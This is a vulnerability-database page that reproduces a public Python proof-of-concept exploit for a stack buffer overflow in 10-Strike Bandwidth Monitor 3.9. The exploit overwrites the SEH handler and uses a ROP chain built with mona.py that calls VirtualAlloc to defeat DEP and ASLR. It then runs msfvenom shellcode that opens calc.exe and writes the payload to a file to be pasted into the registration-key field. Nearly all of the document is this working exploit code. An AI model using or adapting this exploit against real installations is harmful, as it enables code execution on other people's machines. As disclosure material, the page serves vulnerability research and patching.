Vulners
Lucene search
10-Strike Bandwidth Monitor 3.9 Buffer Overflow Exploit
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
OS_retSled = '\x41'*400
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = '\x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2020 00:00Current
7.5High risk
Vulners AI Score7.5